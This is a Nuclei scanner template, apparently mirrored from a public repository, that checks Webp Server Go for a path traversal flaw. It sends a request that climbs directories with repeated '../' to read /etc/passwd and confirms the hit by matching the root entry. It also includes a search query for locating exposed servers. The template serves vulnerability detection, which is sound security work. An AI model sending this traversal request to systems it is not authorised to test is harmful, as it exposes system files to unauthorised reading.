mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-10 20:53:27 +08:00
30 lines
947 B
YAML
30 lines
947 B
YAML
id: webp-server-lfi
|
|
|
|
info:
|
|
name: Webp Server Go - Path Traversal
|
|
author: ritikchaddha
|
|
severity: high
|
|
description: |
|
|
Webp Server Go has an Path Traversal vulnerability. Attackers can use the vulnerability to access arbitraty file.
|
|
reference:
|
|
- https://github.com/webp-sh/webp_server_go/issues/92
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
fofa-query: header="Webp-Server-Go"
|
|
tags: webp,webp-server,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/../../../../../../../../../../../etc/passwd"
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "regex('root:.*:0:0:', body)"
|
|
- 'contains(server, "Webp-Server-Go")'
|
|
- "status_code == 200"
|
|
condition: and
|
|
# digest: 4a0a0047304502204a141f8f13ed12e677f4e1c8b0927f0cab686dc32e5a93298f0e308e04c6c22c02210084f3304208de20e1a8763329f52b7304b550c66e3e9cb7e4acfe79138190000c:922c64590222798bb761d5b6d8e72950 |